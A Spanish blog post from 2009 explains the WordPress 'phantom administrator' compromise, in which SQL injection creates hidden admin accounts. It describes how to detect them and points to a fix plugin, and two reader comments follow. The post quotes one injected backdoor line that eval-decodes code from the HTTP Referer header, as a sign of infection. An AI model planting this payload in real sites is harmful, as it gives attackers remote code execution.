Linwind

Solucion al problema del Administrador fantasma de WordPress

En estos últimos días está siendo explotado un problema que acarrea WordPress durante unas cuantas versiones, se trata de una inyección SQL a la base de datos de nuestro WordPress que permitirá la creación de un usuario con permisos de administrador. En muchos casos el problema se agravó con modificaciones en los permalinks al estado por defecto de WordPress o la adicción del código ${eval(base64_decode ($_SERVER[HTTP_REFERER]))} convirtiendo en imposible la navegación dentro de la página web.

Detectar el administrador fantasma es muy simple ya que entrando al panel de administración de usuario veremos que hay más administradores de los que realmente tiene el blog, aunque no lo veamos en la lista, si veremos que hay más administradores que en el número que aparece al lado de administrador tendremos administradores fantasma.

Gracias a la gran comunidad que tiene este magnifico CMS ya disponemos de un plugin que lo soluciona, este plugin se encarga de comprobar que no existan administradores fantasma.

Publicado el 6 de septiembre, 2009

Solución: No tiene los permisos necesarios para acceder a esta página en WordPress
Publicado el 03 Feb 2011

Copia de seguridad de tu WordPress en Dropbox
Publicado el 05 Jun 2011

Solución al los problemas de ping y trackbacks en WordPress 2.9
Publicado el 23 Dic 2009

Activa la cuenta de administrador en Windows Vista
Publicado el 15 Feb 2008

3 Comentarios

  1. walter sufan dice:

    Hola amigo. No sabes como te agradezco tu interes altruista y desinteresado al publicar un parche para este problema. Casualmente hace unos dias que me di cuenta de que tambien era victima de ese agujero de seguridad. Lamentablemente no fue suficiente para mi así que acá (http://sumolari.com/otra-solucion-al-administrador-fantasma-de-wordpress/) te dejo un link con una solucion que si me funcionó. Un abrazo

  2. anonimo dice:

    hola
    mira entro inocentemente a un blog que es de wordpress y aparece este usuario registrado tipo no follow y me harto de que no me dejan agregar comentarios en el blog porque dicen que hago spam. tengo archivos detallados sobre el caso pero que son dificiles de entender ya no se que hacer y llamo al servicio tecnico y me dicen que me comunique con el administrador del blog y no encuentro como, ya hice venir a tecnicos a mi casa y revisaron todo pero sigue haciendo spam en ese blog por que? por que no me permiten la comunicacion y cuando empezo el problema el moderador dijo que me registrara en http://www.wordpress.com pero segui los pasos con dificultad y luego continue escribiendo creyendo que ya no hacia spam y me vuelven a decir que sigo haciendo spam ya no se que hacer y segui haciendo comentarios creyendo que eran sin spam, escribia pero me seguian diciendo que hago spam y encima ese maldito usuario registrado me mandaba emoticones luego del insulto y me enloquecio ya no se mas a donde acudir y espero que este mensaje no haya producido spam en este sitio
    no se como hacer el comentario sin que en ese blog se destine como spam. y quiero sacarle la ip a ese maldito. y otra vez no encuentro otro medio para pedir ayuda y disculpas si hago spam. estoy harto de pedir disculpas por spam ya no se que hacer por favor. y disculpas si me desvie del tema de este medio.

Dejar un comentario


Actualidad Windows Linux Juegos Redes Sociales Utilidades Telefonía Movil Micropost